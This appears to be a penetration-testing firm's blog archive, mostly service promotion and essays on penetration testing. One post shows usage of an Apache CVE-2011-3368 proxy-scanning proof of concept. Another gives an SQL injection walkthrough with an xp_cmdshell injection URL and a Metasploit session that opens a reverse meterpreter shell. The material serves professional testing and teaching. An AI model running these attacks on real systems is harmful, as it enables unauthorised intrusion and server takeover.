Penetration Testing | SECFORCE

Home : Blog

Posts Tagged ‘Penetration Testing’
	« Older Entries
	CVE-2011-3368 PoC - Apache Proxy Scanner Monday, October 10th, 2011 A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network: The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character. SECFORCE has developed a proof of concept for this vulnerability, available for download from our security tools section on our website. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall. The following output shows the usage of the tool: python apache_proxy_scanner.py CVE-2011-3368 proof of concept by Rodrigo Marcos http://www.secforce.co.uk usage(): python apache_scan.py [options] [options] -r: Remote Apache host -p: Remote Apache port (default is 80) -u: URL on the remote web server (default is /) -d: Host in the DMZ (default is 127.0.0.1) -e: Port in the DMZ (enables 'single port scan') -g: GET request to the host in the DMZ (default is /) -h: Help page examples: - Port scan of the remote host python apache_scan.py -r www.example.com -u /img/test.gif - Port scan of a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local - Retrieve a resource from a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local -e 80 -g /accounts/index.html The tool can be used to perform a portscan of the target host in the following way: python apache_proxy_scanner.py -r <target> -u <uri> The following screenshot shows the result of the command above: Apache proxy port scan results The script can be used to perform a bounce scan of a host in the DMZ or in the Internet: python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d internalhost python apache_proxy_scanner.py -r 192.168.85.161 -u /rewrite/test -d www.example.com Apache_proxy_scanner will report open/filtered/closed ports in internal and external hosts. Tags: Apache, apache_proxy_scanner, CVE-2011-3368, mod_proxy, mod_rewrite, Penetration Testing, PoC, SECFORCE Posted in Penetration Testing, Tools, Vulnerabilities \| No Comments »
	SECFORCE is now CREST certified Monday, July 25th, 2011 As part of the SECFORCE commitment to ensuring the provision of high quality services, SECFORCE has now achieved CREST certification. This will further complement the strong existing methodology and work of ethics. SECFORCE is already recognised as one of the leading penetration testing service providers in both the UK and Europe with the ability to demonstrate expertise and professionalism to ensure clients are totally satisfied. CREST Penetration Testing “CREST is a not for profit organisation which brings a demonstrable level of expertise and professionalism to security and penetration testing market. The bar for entry is set very high to protect the interests of the buying community and provide a clear differentiator for professional testing companies. There are very few companies in the UK who can meet the requirements of CREST and those that do, like SECFORCE, have had to demonstrated the processes they utilise for testing are sound, they have adopted industry best practice in their approach to testing and they handle sensitive client information in an appropriate manner.” Ian Glover, President of CREST The addition of CREST certification will provide further reassurance and confidence to the many clients where SECFORCE has already built a strong working relationship. “We are really pleased that CREST certification has been achieved and view this as an important step forward in the continue enhancement of our service delivery” Rodrigo Marcos, Technical Services Director For more information about our CREST assessments and discover how we can benefit your organization, please visit our CREST penetration testing page. Tags: CREST, CREST security, penetration test, Penetration Testing, SECFORCE Posted in CREST, Penetration Testing, SECFORCE \| No Comments »
	GUI manipulation and penetration testing Friday, July 15th, 2011 Whilst in the web application development world it is becoming very well understood that “you should never trust the data from the client side”, this is not always the case in local applications. In web environments any restriction enforced at the client side can be easily bypassed with the use of a web proxy. However, security mechanisms enforced in desktop applications sometimes can be manipulated to perform unauthorised actions. During a recent penetration test we found a desktop application which needed to be assessed in regard to security. GUI manipulation was used to conduct a number of attacks. The tool of choice for this particular attack was “DARKER’s Enabler“: Denabler used for GUI manipulation DARKER’s enabler is a tool which allows showing and enabling objects in Windows applications. The application to be tested had a number of disabled fields that required to be modified for the purpose of the penetration test. Specifically the “Encrypt” checkbox needed to be unchecked, however the application showed the field disabled: Original application window With Denabler we dragged-and-dropped the red square to the target application in order to identify de Windows handler of the field and then enabled it: Denabler in action The action enabled the field and allowed the penetration testers to disable the encryption in the application, which resulted vital in the outcome of the penetration test: Window after enabling the fields As shown above, GUI manipulation can lead to unwanted consequences. Extra caution needs to be exercised during the planning and development process to minimize the risk of GUI manipulation. Tags: application manipulation, application penetration testing, application security, Denabler, desktop security, GUI, gui manipulation, gui penetration test, Penetration Testing Posted in Penetration Testing, Tools \| No Comments »
	SECFORCE invited to present at Athcon Saturday, June 18th, 2011 SECFORCE was invited to present at Athcon conference, held in Athens during 2nd and 3rd June 2011. AthCon is an annual IT security conference that takes place in Athens Greece designed to give a technical insight to the world of IT security. A realistic, practical view of current and evolving threats and security trends presented by top international security experts. SECFORCE presented a talk called “What you didn’t know about Metasploit”, covering the history of the Metasploit Framework, architecture, exploitation and post-exploitation features. The Metasploit Framework is mainly used for exploitation purposes during penetration testing engagements. You can download the slides from the talk from our security research area. Tags: Athcon, exploitation, metasploit, Penetration Testing, post-exploitation, presentations Posted in Penetration Testing, SECFORCE, Tools \| No Comments »
	Exploiting SQL injection vulnerabilities with Metasploit Thursday, January 27th, 2011 In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker. Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures: http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell ‘ping 192.168.1.64′;– If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module. The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester. It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above: msf > use windows/mssql/mssql_payload_sqli msf exploit(mssql_payload_sqli) > set GET_PATH http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- GET_PATH => http://192.168.1.66/ showproduct.asp?id=1;[SQLi];-- msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66 RHOST => 192.168.1.66 msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp PAYLOAD => windows/patchupmeterpreter/reverse_tcp msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64 LHOST => 192.168.1.64 msf exploit(mssql_payload_sqli) > set LPORT 80 LPORT => 80 msf exploit(mssql_payload_sqli) > exploit After the exploitation the attacker will get a meterpreter shell. SQL injection exploitation with Metasploit If you want to use this code you can download it from Secforce security tools repository. Tags: exploitation, metasploit, ms sql server, Penetration Testing, sql injection Posted in Penetration Testing, SECFORCE, SQL Server, Tools, Vulnerabilities, exploit, sql injection \| No Comments »
	Metasploit and SQL injection Monday, January 17th, 2011 SECFORCE has released a set of scripts for enhancing Metasploit functionality exploiting SQL injection vulnerabilities. This is particularly useful in two scenarios: When an attacker achieves command execution on a database via SQL injection, but he wants all the functionality offered by Metasploit. The attacker identifies that the backend SQL server is vulnerable to MS_09004 but has no credentials or direct access to the database. The scripts can be retrieved from our security research page. Tags: metasploit, MS09004, Penetration Testing, sql injection, Tools Posted in Penetration Testing, SECFORCE, Tools \| No Comments »
	SECFORCE has co-authored the book “SQL Injection Attacks and Defense” Tuesday, March 31st, 2009 SECFORCE has co-authored a book fully dedicated to SQL injection attacks and published by Syngess. This book targets developers, penetration testers and security professionals. It is entirely dedicated to SQL injection attacks and defense, and it is a standalone resource with all the necessary information about the topic. SQL injection is one of the most devastating vulnerabilities affecting web applications. This book provides penetration testing professionals with all the necessary information to discover and exploit this kind of vulnerabilities. Tags: book, penetration test, Penetration Testing, sql injection, SQL injection Attacks and Defense Posted in Penetration Testing, SECFORCE, Security Books \| No Comments »
	Penetration testing - service or commodity Monday, February 23rd, 2009 We face this kind of issue everyday. There are two different approaches to web application penetration tests: An increasingly number of companies are buying automatic web scanners, run them, generate some results and put them in a report-shaped tin, ready to go to the client. No human interaction with the application is needed. Some other companies allocate X numbers of days of a highly skilled consultant to assess the security of your web application. Among many other tests the consultant will also run automatic web scanners, but that is only scratching the surface of a real penetration test. The consultant will use all his/her experience to analyse many other factors of the application. Penetration testing is all about assurance. In the first case the client will get some useful results, no doubt about it, but what level of assurance is it going to get? The report will cover the vulnerabilities discovered by XYZ software. Is that enough? I don’t think so, but that is for the client to decide. There is no question that the report will be incomplete and many issues will be missed. In the second scenario the client can get the assurance that the results obtained were the work of a motivated attacker focused on the application security for X numbers of days. Is that enough? Again, it is up to the client to decide but in my opinion it gets so much closer to an acceptable assurance level. It all depends on what do you want to be protected against. The decision in yours. Tags: information security assurance, penetest, penetration test, Penetration Testing Posted in Penetration Testing, Risk Management \| 1 Comment »
	Advantages of penetration testing Wednesday, January 7th, 2009 Many times we are asked, what are the advantages of penetration testing? why should I conduct a penetration test in my business? If you find yourself wondering whether or not you should conduct a penetration test, then you should try to answer these questions: Is my system secure? How do I know it is secure? What are the consequences if someone breaks into it? We often hear people answering these questions saying “Yes, it is secure because it was designed with security in mind”. However one can argue that penetration testing doesn’t test the design of your solution, but the real implementation of it. We have found many good designs poorly implemented. Too many times the theory is too distant to the real thing. You may also answer “I don’t know if it is secure or not, but I guess no one is going to attempt breaking into it”. There are many different motivations for attacking a system and the only way of ensuring that the security of your system is not going to be compromised is by securing it. The advantage of penetration testing is that it gives you very accurate information about the real security posture of your system. Only if you answered “None” to the third question you should not consider investing your resources in a penetration test. Tags: advantages, penetration test, Penetration Testing, system security Posted in Penetration Testing \| No Comments »
	why penetration test? firewall is not secure enough? Tuesday, December 9th, 2008 A few days ago someone visited our website after searching in Google “why penetration test? firewall is not secure enough?“. We are going to dedicate this post just to that topic. A firewall is a device connected to two different networks and with a number of rules which determine what traffic goes from one network to the other and vice versa. That simple. For example, a recommended configuration for a firewall protecting a web server is to filter all inbound and outbound network traffic by default, allowing only inbound traffic to your web server port (TCP/80). Firewall protecting web server at the network layer No doubts this is a good configuration which will protect the web server from many attacks. The firewall will filter network access to many services, but the question is “why penetration test? firewall is not secure enough?”. Well, the answer is “no”, with just a firewall the above environment is not secure enough. A firewall is always going to allow some traffic, otherwise it would be better removing the firewall and having both networks disconnected. In the configuration above the firewall allows connectivity to the web server, therefore an attacker targeting the website will have full network access to it. The firewall will do very little to protect the web application. So back to the question, “why penetration testing?”. Penetration testing is a method of assessing the security of a system or network by emulating a real attack scenario whereby a security consultant assumes the role of a motivated but non destructive ‘hacker’. In the scenario above a penetration test will highlight any misconfiguration on the firewall and, what it’s more important in this case, will identify any vulnerability affecting your website which could be exploited by remote attackers. In summary, a firewall is a great security tool which can protect your infrastructure from some threats, but they certainly can not protect you from everything. Additially, penetration testing can be beneficial to assure that your systems and applications are secure. Tags: firewall, penetration test, Penetration Testing, web server security Posted in Penetration Testing \| No Comments »
	« Older Entries